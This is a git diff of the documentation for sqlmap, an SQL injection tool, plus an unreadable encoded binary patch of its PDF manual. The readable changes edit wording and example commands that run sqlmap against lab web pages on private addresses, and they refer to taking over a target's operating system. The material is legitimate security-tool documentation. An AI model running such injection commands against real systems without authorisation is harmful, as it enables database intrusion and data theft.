-with the -c option as explained above in section 5.2:
      
+with the -c option as explained above in section 5.2.5:
      
 
      
 
      
 
      -$ python sqlmap.py -c "sqlmap-SAUbs.conf"
+$ python sqlmap.py -c sqlmap-SAUbs.conf
 
 [...]
-[hh:mm:16] [INFO] performed 657 queries in 6 seconds
-
 banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
 (Ubuntu 4.3.2-1ubuntu11) 4.3.2'
 
      
@@ -5372,19 +5831,20 @@ banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
 
 
      Act in non-interactive mode
      
 
-
      Option: --batch
      
+
      Option: --batch
      
 
-
      If you want sqlmap to run as a batch tool, without interacting with you in
-case of a choice has to be done, you can force it by using --batch
-option than letting sqlmap go for a default behaviour.
      
+
      If you want sqlmap to run as a batch tool, without any user's interaction 
+when sqlmap requires it, you can force it by using --batch
+option, and leave sqlmap to go for a default behaviour.
      
 
 
      Example on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&name=luther" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_str.php?id=1&name=luther" \
   --batch -v 1
 
+[...]
 [hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
 [hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
 [hh:mm:22] [INFO] GET parameter 'id' is dynamic
@@ -5414,23 +5874,23 @@ back-end DBMS:  MySQL >= 5.0.0
 
      
 
      
 
-
      As you can see, sqlmap choosed automatically to injection on the first
-vulnerable parameter which is the default behaviour.
      
+
      As you can see, sqlmap by default chose the injection payload to the first
+vulnerable parameter.
      
 
 
-
      Clean up the DBMS by sqlmap specific UDF and tables
      
+
      Cleanup the DBMS by sqlmap specific UDF(s) and table(s)
      
 
-
      Option: --cleanup
      
+
      Option: --cleanup
      
 
 
      It is recommended to clean up the back-end database management system from
-sqlmap temporary tables and created user-defined functions when you are
-done with owning the underlying operating system or file system.
      
+sqlmap temporary table(s) and created user-defined function(s) when you
+are done with owning the underlying operating system or file system.
      
 
 
      Example on a PostgreSQL 8.3.5 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/iis/get_int.aspx?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/iis/get_int.aspx?id=1" \
   -v 2 --cleanup
 
 [...]
@@ -5459,19 +5919,22 @@ WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
 details.
      
 
-
      Whatever you do with this tool is uniquely your responsability. If you are
+
      Whatever you do with this tool is uniquely your responsibility. If you are
 not authorized to punch holes in the network you are attacking be aware
 that such action might get you in trouble with a lot of law enforcement
 agencies.
      
 
 
-
      7. Author
      
+
      7. Authors
      
 
 
      
 Bernardo Damele A. G. (inquis) - Lead developer.
 PGP Key ID: 
 0x05F5A30F
      
-
+
      
+Miroslav Stampar (stamparm) - Developer.
+PGP Key ID: 
+0xB5397B1B
      
 
 
 
diff --git a/doc/README.pdf b/doc/README.pdf
index 1c69e46b5eb35a3c50e73b55dceb2d872f9caa51..e2910ff5c0a60ef9d22b04cc00858eaaabfb856e 100644
GIT binary patch
delta 237964
zcmaG{cOcf^_qX@n+e7wvJbOg8%8Ei7$dK`h`9{zzKm3|XIX|MtxdL9naKX0~zK6(PEqUQ#Z3>=`HUK|)QC;=V@
z9tFbhCf)&F9w9*?-T`3FA&%g$x7}-H5gETN^L;xN}9(odxW>f~p8L2H;>G7b9QH0qp)WypK^e}2=
zBU#vg%^yzyb&T@Bg+~fFd$LPo{=GH=>YwS^x`cRngn>g$IIx?ENAUNWH~x>X+hqYJ
z;kz45JV29~12i%zum^<%Mn)n00=>WiW;~E(=9VX7{t;&p=;DspZfk3e2=NFG_XrI`
zc!mV}BV0fSvpUe{-~zH}wtpr_Bmg8cQozOCJ;Wn4)FV{&AI*aVK51%Wehd=-?^%;j
zppaP`Djg&zvYoYCz~4B%|g|k2a6goV^ss|7#8q|g_VJf0nIF%
zz;#x2kdOVXJ2C+zv8n(zHZ{J#Yyyo!0Yz2?5Xq*&_t(_WC>$7O-2~d%G_Zt!&kBwD
zZ7ejk7`lXdyJ;Ydy}hW)p&G;vTMJ8YfK3t**wyHXz=d5@oz~LGBP7h*)7#A@%md*P
z9(K?pAdLC|?dJEw&}b}><5td@i(+O5>uj7t=-*~X6G7W4AkKjY&g?wEk%I#Wvde=~
z4ytx}0n&g4d|+o|z~Dd-yAC~urlk%8)_=AEjUj>0?ApMEQj`(dpi11Kqs}K*ba6gw2ghyl$
z)einzA3%#pQ>|C-?_I$CHeb^K9}hR0FI98l0k07YKytEyA6y(jpHmJxQYV`VxNXGt
zdr3GFIM1mKQn{tU02dEE7L;*|f-9VgK#xlnyyI2{N4fYIpy%XrsR3smRWJn~2`I46
zB?n%?$L-vFfSZ>CxN<84BVO9nz-?|G5Ci}Bj9UnlQ~$@y16X)?7>F1k!ea)Q_*6kE
z4P7@(!zhu-2LpbmcWaf1s2oIsSH7u*xjQ25K^F{t0}VY8uS
zsD6(Sz$=IcH~6_3F(?wK<(C8Df*OELfE$59|MqEPk1(iXgtsRG8X*EYDs_**W&t@i
zgoBE)p@D-cXoXTT1$Y?H1duNv3a~=z@K|&f5(TRQvLHuD9bB|x`DYI>(B5nX<+Fv=
zfu1!Bzz7R~YC&nLmF4KiF*9@j>jcJP0Kbqt=oOX*)%ZuL<+0;(xE%4(dkJ-NVy609vePcmU1D5Z=G7?W-sj>=WSw+F~3U8#ee$CQYmV
z)iV@o%FcKz)KsLHGS#5r4&D+I1;QdyAf8DTRER<|!vQ}LX=!(tFc(*sP^zLsB0NHr
zq5F9I!KbLuFb{taBd!eUJ>Xd^#sg~M%`qz?q5S{$_y~`@F=EfA4|4
zH@t`sg;Ea)@6fQ2D1?if8#KN@63DdEj|q*2htne|QMp|n@bYm%{8v9;k0?Zhi(j}0
z7?4r`nS#8Au*+ZGfkpj3QS3v!sR!==BLzWKI8c?A2l~eR+o7nxPD1P-M>F>DgRb-c
z%KE(+Ea+fU-3*2Ob<$z~+#dhis{ZswfdqaP1K9nqTM7HeiT}6m8%p^jWaBn5fl~gu
z!mxjCmH%4`O)38p1#yQ8RTA;vn~TN#QS*Op?(a=Pghd5;{E>wDb=!0B{k>!G6nQ8v
z!vK#6c*d)tG04Bn2#fjc^Zy)oR5#j;2+fw1`(uPy>ak-1JO3>k``ZS$`h|xc{O8Qu
z@I=qR5a{b6A@Dx_b;JFcES6@Gf>7Y!Hi0DoF$pzz-N2)34}AOgCjYt4;IV_)78vLS
z9o{`K#21==Xt-b4uNyQp$ioc+0;+dGw1qbDKq`&qX
z{~Hw;`FXem08c4-83&b62UQyKfd`$R2kr6C?BJ~{LBrW~QrwJKc=f)Nl7xDTXWIBL
zr!5
zT-hDpAsOAFJ!ufV#q6*iMgQ_qIcF|bC(OLzR0@tx?uip-@z&Z+$t{w>jh}
zYKx?KuLpYi>ko#y*AKJ=KBRPCIn--prm|?QndBVL_oZvEm0qF7JnGo?0n@<~hac^4
zOAt*u>(ZmLl|O%{v(U%I;Ng$G4JT~L_lC6E4}VyS=bMmC)t&cPlYb!29lDg5{8c$d
zskkBiBV*_m#@!e9#%ZQ}oh7Kst(zz=$EqVi;W8)fILrhC>%
zC{{A@^96Copj;ocU})Oa*pqUJ`_39F>@#FK%-BGec8y*k*F7cocFxsPS6*ARnlD`a
zcJ2Ht^Wr1wDW)y~UJr_&x0bVAQ$1(z^xj*)#OyeMo|QbIzDKoa{fqIH`|7Kyk2*L{
zfBPt}NmS1r#+DDbbv|iT>2-cyNhz|7x)!Bn7W%y{o|`Lik7-G~^%2cv+c)><=k}lt
zGY@ctC&ca5nR7B@+2=vO4WY1`ZGzWT>Z|N&uBn_|MyYEqr_bcgo>shSPe)RiC|=(b
zW!-;VQbpe=|I8%!DQvRK!AgcAQG@g~^I&_AT`Hq^+_e0@zQnWM`xw{`J?J1&KFsp|
z{4(#ibTb-j6l}gvkRUC2x$BeJzd#x#xYqw
z?Rl+tYt2YA!bgX>^H-CP*RXLeE2Zyi*wNJbrA+K8D`EXmtmA`n%?CFT>df40AzW55x;WuW*J5p#)T7>d&1A!t_mV58nVJJ9MT&1d
z^e4InQP^Bx_e&@G{s@bi=G&H@qs&I9#qdl$k)ym3_o3evR2Xwl$GUqvySGe2_&gokqfZNWRE6J=sF6nT;
zUi7~?iDtRJ?+~ffk!NR3tLt>c0j>566#oL1&7|J$vQL}sr=9Z7YSm~A+$lR3t9bjq
z)3ey&w5}P_Nq1fBBN@98m#x*B3hSS@T|Zu1ZB{)@jCfRb#=2MP<7``@w{FDuz~oDu
z_b%kmILsf>(^nLE6$&a|Kc`q`Yk4Z9d`MC0l^YqIS5^p{m^#nmGN-2bo?gmGHYI~n
z=K6L|d4=S7LD{=8uTcZtfE_$Xsvr2DRk`l%Jr?XcJhCfjsPS^1P1Q)Sejg{t+YEYK
zkOt|%=a;Po_&aqce&i;!JMI>fD9Qt%aa+M!j&s0ztH47
zPM_?8RnBn?vF$o?HFthw!S2qTWPAcs;@J+*W%YZPwry5&<*HZN*FJbfGuYJ8K@9=sZ;FM#XeYRRp
z=^xQ#qcb{)4P=vFWohsi-6rOLNJIF!$~fEkFxhP6lkMB(YIV%H(fzG_Jc;-7^tJak
zzT0bKs>W6JVxJA)#W*d+1JmAD4IX`Sc-DX0>x<-VqncHz(z&-3VmjTujPFuk4`0r?!tXn4Y^NaRA=Jug>7;E
zdiuiIX{M!#CEWNLr$M4^PF5(BAiORJIgc;UBSdgCIJb*KYnMl8V0Z{bjR-864CF3r
z@Z-=_2m)Uj1Ox=an{_`B)sNbQB~fquT?i}*`|Fo_$55Z~zkUhein}AdBRH^QGvM>*
z0nCaKfZGa5{aX}GCL&2V9D<0(Bk_+R$4S6_Z7n-<2RVo1_zbG!MwE&knv>&2xVJvdZ!L3Q+5W#UDRJTV5?#e`hNXA
ztFi|~+Zc)9u>>T%c@dC%Bhdsj0*}KZF(~k5w<=^9tc(y!0v1~fD3VPG1t)|i!j>o`
z7B)l^kdO$|Z&jk*w5_WApvsmy4l8(|#>R>!K^O^xGcVN0;Gh~m*k@-XiX)JaFdhJx
zhC^aW1O$#qLXy#B;9{mi9Sm^6Koy5NCs?+l$q~lkA;Kn+5NHw+iNc`~I06cS^f^3a
z)v)zNbwO};H*K{-I1CET4Ua&RNk|Nugur3ZNZ3#rPE8Du?P-lfuw*onL?pvTL?jM}
zN8nHpzQ8!p_Kg+rFtTvz>cY?(EpUe=fh?3ZRh1%G0t{5(FbFgn?hpjSSRxil#z7Tr
z^mEtbXCPt0pof7776%tbAixRZkz^DBfyLvIX#6i_a=;)PGb0=UOz292IaL%l76Z2$
z&Ie0IVu@f4iK3D^a1IIO;Q>F^5M*kxv7pJ+M&Oc`F3{HE2YvS3;DHs1heSf6up|To
zH*ij5V1UvE{qXfi4;_$i%qD^%kdYX;ofxW$@$i>~LZaYI@OTi55(Lqn#v&Lz3T_}C
zfyI%LC?XC4nLs0HzLEUIx$nTM4
zEHoZyGz1J5)I-amF5w}XAGjYh7D1Bk@S!bQ
zl&VM~0gu4out?~ta9Sj26;%7e0ezex7}{vZi-y)hhIWO)Le-*iU;?iThH?BL$`=}q
zkq8f&j3mSESZID^xH0JjU2p`?56FJB*IXnl5(gty7&ui7&?M>r6#}0i4uytJ4kNt?
z9UTrWV+4ecIh{fDNaeFaMZ@3qO}#$AsnPZ71pqJ3-9_;}GAIJdxL7g6-^QE0hh!GD1H08Z2
z5X72CpCbwNf447d;Wff}n$Bva`!4jCqx{;UC{F9VSC)7sk0`NI$Mf&hmBYaB)S826xry(E1r)^Y(x!>~oy{ZERQS=3A3>eBFik
z_)La_BFW-bNs-rnCgmWblwMKlOu^Nx)tN-*1Fz~XkFFX>A4#p#M_%_Wipf2C@kq{X
zdv8h>shUfs;49)ds;km|Ys&|Xn?%0nwKGk=440qy^$^rGF1fF
zY1`ekTcVS-IS-DbWNW*mOh#jQE6r~|c$HQamUNp?o)SYZ9X^)t=21Z$BDM3h^d(CC
z+?znjUiFYsXPj&Rry>nyO`N7Qqih8uclqm3j-}@WJ79W(^>Sn`2IMp58%L*L_Kq8W
z_OP4!z>a^SC7@8l%$`$Zh`fWzV743XIeB2X>?rDsh;#<)RPzh$p?DX86W_*8L^#gx
zQZd0au@sy`Nn2Qn2iiY%V>}jwNq*WdcZ$;JWK`(-&mDj4eD-no^MUpUq*3pqiaF=cevR^aYnjpS
zQ7n|3<8bWyGmwTfJ(~%7xeAzh@|o>UR6RWstEpEpZZIq~9)V6^LGASE3%zJ+dVOTv
z(&(i~^s4{t&dIQZ$)%BqKz`<61SYrod0wGPGNrx!!}4@7YT(D};*YTUd#TkEUS^$_
zBK8yY?)L{ZMLZ-XMM(Vk99PV@k`iaJt6!&TsmcHTmm@1=&P5IZqzs+jbb=oDOk$>1
zG@bI?FsGG55*MOSYEO*znO@ZF(>ts4rFT$~M#!<0I~GLIOf+M&mA?
zPPjsF4cUuuT3&zR*`BdNypzT0PK}5&Z%6zWVmHgKu`-`!`VQz<1;I)+cg~4g24M)Q
zeqq-?uoj2QF}TQ}N%=2W3jr@R0=5f*LsM@z>hA``#i2LuB^-JK;^N@-wDEr9BErGD
zYvcK!{^X5kTI>$Wf%g>cJ?57@43sBN9e|cFrT+dBi1{TD0szZQ(0#1SE`hFAsO?hwy_Ob?xnlvf*p8+1{$HX30_
zNFotp4FZhj!K?_%6GcNA&g?88kjMc*JgprM5e?xKyz#L(2q6ie&2tM-HxL9i3Dno3
zJY)zM2@oh^AYdfpL9mw&cnM!`Pvil0>RJ$>v5U|kFuc8tE4xWe5I-e2j3bs8~}J!e=C&umQxdP@@DmdHgT%#BC%1!}a_~8qDIw
zL;MVpE^YB76cMbN=(7KwaE_G)BW=dKcnCf51c+21+Jbfh&TU0e(`C%Gpk|KgR%Ti1
z!i4b<))C1Nq2h56eqs=KA_^kR1WN)~Fctv4nKXq9<8f#t3K|&(vJMQMh`>W^MgshH
z1ejc71LsXRz_Bb^OW?nqjTHlB5Mj76db>6tY!v|ev$cRTT9_A)g3yfsZ2%9qnScjU
zrW<(mHa81+yOo0xS|3#xA~+HbrY5lv>676v4uPZMSQ3QBL=dqJstlSBY{r8lK$s7W
z0BVj5Vg6n-9U!uuswrNqu`mwW8?`SCrjP0o#>hjYV%W5Bh%2mCLbHPV8#K~VNBF!h(iNf^&ud9C91zGt_pO0xZCJ2M0KOiib*%grQMkp)p~o
zW`l#{LW6)V0lftb2(STAEJkaEgQf<(0|UJoZWlB`n1-Qx2OgZa5&%qhwE$wLs1OE=
zB*GXp208?e3`qlYc{FWMJ!?MjWTO!mmDxZ>0ZoBO0%|sTjAW?2qzan$c&V(0nmfhd
z2uLFIsa6{l%tZ==<2yNkLnTc`Fzb$o;-Mcvk_@pu+z7}n5-dqTaTh;OxJPRQe%M0e
zCP9b6p#i6z&PKZO`7UlSztI3v8)#-&I7`U)NHFbNYDXQ37x>ulfyVnAR)mIDL_MA`
zkgeh&M?|CHkpf+A`-T-U+wy^vRkZPh;ZP*1AHX$}shWpI1eZsph()#nK(PTvAPhx$
zp*|pSgR>$bNH8q{4wz9HIy)G#;{!P*JS>n6;h;sA7b`O2paJohi1Gd*DKuh}6Fg3@
z4kPXSW%R;~B*>;WNQ&v9S0ui=mD_Xv?`J!o-W&E0&}YktYRp4PF|bzN4Ac42)r^t*
z8E1CuPIsD-A)sRqE%%sSziyj$-NDzTy60|7Nh)h#?|fPThpX7vsqp6B{J1bwxGw`<~Z|JrjbdDHaFOqTI3g
zU9lHevov4Jwv7fIq-+VS(CA%0DBYHr{AR8#ON$
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
